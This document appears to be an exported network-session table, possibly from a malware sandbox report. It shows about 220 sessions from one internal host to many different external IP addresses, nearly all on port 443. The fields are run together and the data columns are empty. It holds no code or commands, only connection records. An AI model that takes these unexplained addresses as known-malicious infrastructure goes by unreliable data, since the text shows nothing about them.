                                                22385192.168.2.2348804168.190.53.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22386192.168.2.233631245.250.105.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22387192.168.2.2350302179.86.160.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22388192.168.2.2350148200.80.88.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22389192.168.2.2358504158.215.98.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22390192.168.2.2333412208.131.111.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22391192.168.2.2345312111.198.237.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22392192.168.2.233758874.188.218.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22393192.168.2.2339970105.124.32.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22394192.168.2.2334632206.74.131.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22395192.168.2.235515871.197.98.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22396192.168.2.2359946162.78.43.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22397192.168.2.2339228153.164.86.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22398192.168.2.233409454.186.25.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22399192.168.2.2353106172.1.202.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22400192.168.2.233519048.28.219.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22401192.168.2.233934288.199.21.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22402192.168.2.2342076130.95.20.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22403192.168.2.2346746180.189.118.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22404192.168.2.2335962206.247.228.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22405192.168.2.2336418178.162.171.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22406192.168.2.23502881.63.51.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22407192.168.2.2340394145.194.25.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22408192.168.2.2350336191.24.80.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22409192.168.2.234883481.189.64.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22410192.168.2.235350427.32.113.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22411192.168.2.2360066112.145.217.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22412192.168.2.2336448170.72.210.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22413192.168.2.2344390190.23.167.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22414192.168.2.2340408125.57.53.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22415192.168.2.2333334185.27.254.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22416192.168.2.2360744162.128.186.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22417192.168.2.2349380162.194.244.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22418192.168.2.2332870109.59.133.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22419192.168.2.234672437.48.151.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22420192.168.2.2349156115.54.90.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22421192.168.2.2339766128.150.128.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22422192.168.2.233708881.123.116.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22423192.168.2.2355608198.38.5.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22424192.168.2.2356178187.189.61.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22425192.168.2.2357208139.198.240.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22426192.168.2.2342614132.51.21.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22427192.168.2.2333698188.168.112.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22428192.168.2.2349998157.51.97.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22429192.168.2.2350136222.73.196.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22430192.168.2.2338898120.143.83.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22431192.168.2.236095617.226.46.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22432192.168.2.233966275.106.67.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22433192.168.2.2334664165.51.114.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22434192.168.2.2356116196.122.138.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22435192.168.2.233382295.30.18.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22436192.168.2.2351522211.46.60.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22437192.168.2.2337906146.235.116.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22438192.168.2.235325035.86.119.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22439192.168.2.2342506154.33.143.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22440192.168.2.2344620101.109.139.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22441192.168.2.2345214153.55.161.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22442192.168.2.2352776109.226.67.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22443192.168.2.2340356165.13.240.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22444192.168.2.2339438181.77.254.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22445192.168.2.2345512139.170.74.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22446192.168.2.234289258.127.163.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22447192.168.2.2334066195.83.118.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22448192.168.2.2360462103.84.38.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22449192.168.2.2355354212.8.84.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22450192.168.2.233469494.103.244.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22451192.168.2.23498084.48.251.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22452192.168.2.234152497.107.129.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22453192.168.2.2348394134.166.241.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22454192.168.2.2350008193.210.207.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22455192.168.2.2349890139.13.76.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22456192.168.2.234009643.7.159.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22457192.168.2.2357460193.64.13.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22458192.168.2.235568851.134.192.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22459192.168.2.2347884198.149.239.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22460192.168.2.2353040190.213.208.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22461192.168.2.234967495.14.108.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22462192.168.2.235410898.216.95.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22463192.168.2.234197435.96.57.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22464192.168.2.2358068132.157.162.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22465192.168.2.2355088122.199.21.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22466192.168.2.2357180221.44.135.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22467192.168.2.2353172138.35.166.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22468192.168.2.2359898101.189.213.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22469192.168.2.2339688201.179.229.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22470192.168.2.2344992143.62.148.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22471192.168.2.2341524181.59.11.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22472192.168.2.23531845.236.41.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22473192.168.2.2345862217.5.173.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22474192.168.2.235720078.26.83.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22475192.168.2.234349439.93.216.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22476192.168.2.2338808175.193.119.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22477192.168.2.2356800171.167.236.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22478192.168.2.2338378178.130.100.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22479192.168.2.2351700106.98.194.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22480192.168.2.2340180144.77.37.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22481192.168.2.2354690106.248.208.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22482192.168.2.2338464176.34.141.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22483192.168.2.2344874202.9.97.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22484192.168.2.2335526190.242.227.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22485192.168.2.234716093.8.158.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22486192.168.2.2345396146.117.213.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22487192.168.2.2340926197.188.227.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22488192.168.2.235478497.39.8.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22489192.168.2.2356794170.93.177.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22490192.168.2.2354450220.200.197.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22491192.168.2.236033662.238.210.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22492192.168.2.2350454155.155.173.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22493192.168.2.235898661.12.219.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22494192.168.2.2357442137.224.225.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22495192.168.2.2336168121.8.24.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22496192.168.2.2337812202.130.182.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22497192.168.2.2344056212.55.11.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22498192.168.2.2352478120.109.191.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22499192.168.2.2346420147.244.21.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22500192.168.2.2340902132.37.46.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22501192.168.2.2357636126.48.238.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22502192.168.2.2354948144.132.118.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22503192.168.2.2356190208.82.77.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22504192.168.2.2347640169.3.27.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22505192.168.2.235921043.229.210.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22506192.168.2.2345984137.118.109.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22507192.168.2.235392842.79.239.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22508192.168.2.2347106179.63.90.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22509192.168.2.2352886125.195.8.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22510192.168.2.234361842.202.180.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22511192.168.2.2339058153.148.112.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22512192.168.2.2345936105.178.65.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22513192.168.2.2350760155.73.23.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22514192.168.2.233685449.167.121.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22515192.168.2.2352750221.150.34.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22516192.168.2.2336350175.122.250.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22517192.168.2.2341890189.22.158.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22518192.168.2.2352768176.174.249.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22519192.168.2.2349750124.34.95.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22520192.168.2.2360386208.229.195.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22521192.168.2.2359150207.125.103.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22522192.168.2.235309627.131.141.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22523192.168.2.235292279.176.29.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22524192.168.2.234379071.183.162.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22525192.168.2.2354760145.169.118.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22526192.168.2.2342730103.144.198.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22527192.168.2.234531269.124.46.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22528192.168.2.2346876137.66.40.28080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22529192.168.2.2344226209.144.188.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22530192.168.2.2345260193.238.32.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22531192.168.2.234673435.201.170.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22532192.168.2.234761463.86.27.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22533192.168.2.2353788172.61.217.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22534192.168.2.236016258.4.43.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22535192.168.2.2356312142.221.193.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22536192.168.2.2359824141.255.205.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22537192.168.2.2339144176.31.192.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22538192.168.2.2354588213.241.172.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22539192.168.2.2339652178.173.122.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22540192.168.2.235617413.192.46.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22541192.168.2.234211643.85.179.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22542192.168.2.2335852155.21.189.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22543192.168.2.2358296101.213.251.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22544192.168.2.2353712116.99.240.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22545192.168.2.2335530213.22.108.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22546192.168.2.2350956174.51.112.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22547192.168.2.23512744.172.103.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22548192.168.2.234047270.193.125.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22549192.168.2.234741691.78.9.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22550192.168.2.2336670114.232.62.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22551192.168.2.234802678.112.111.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22552192.168.2.234789072.11.225.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22553192.168.2.2346946102.182.137.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22554192.168.2.2354646104.43.49.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22555192.168.2.23455404.102.206.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22556192.168.2.2345844109.90.134.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22557192.168.2.2358420196.113.58.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22558192.168.2.2339066165.135.209.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22559192.168.2.233291888.122.63.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22560192.168.2.2350104219.181.150.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22561192.168.2.235011051.85.63.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22562192.168.2.235990869.232.154.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22563192.168.2.233462852.57.61.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22564192.168.2.2342230167.167.103.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22565192.168.2.2350352219.229.94.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22566192.168.2.2339742126.226.78.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22567192.168.2.2350584169.68.135.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22568192.168.2.235170041.195.143.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22569192.168.2.2346964123.106.44.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22570192.168.2.235175024.40.130.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22571192.168.2.2351680105.194.116.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22572192.168.2.233781091.14.48.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22573192.168.2.2347026139.20.96.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22574192.168.2.234874044.254.230.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22575192.168.2.2344214161.95.40.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22576192.168.2.2359172196.67.220.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22577192.168.2.2356132128.226.7.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22578192.168.2.23390942.153.127.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22579192.168.2.2336388102.65.76.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22580192.168.2.235909474.145.175.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22581192.168.2.2357248174.215.3.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22582192.168.2.2346646126.198.77.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22583192.168.2.2336818161.81.84.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22584192.168.2.2336264211.23.74.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22585192.168.2.234782675.182.14.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22586192.168.2.233579420.235.133.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22587192.168.2.235508634.135.231.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22588192.168.2.233679889.44.250.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22589192.168.2.234248820.59.89.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22590192.168.2.2355740172.127.78.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22591192.168.2.2359082181.205.105.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22592192.168.2.235556040.244.176.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22593192.168.2.2349710123.189.237.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22594192.168.2.233305890.2.135.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22595192.168.2.2354200164.141.223.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22596192.168.2.235462497.123.243.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22597192.168.2.2333440158.37.102.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22598192.168.2.234116038.131.47.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22599192.168.2.234350018.80.142.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22600192.168.2.2349988156.226.197.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22601192.168.2.2349184121.154.0.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22602192.168.2.2334526180.103.77.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22603192.168.2.2354344123.105.25.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22604192.168.2.2351274184.217.7.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22605192.168.2.2354902209.190.160.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22606192.168.2.2356844163.73.155.95443
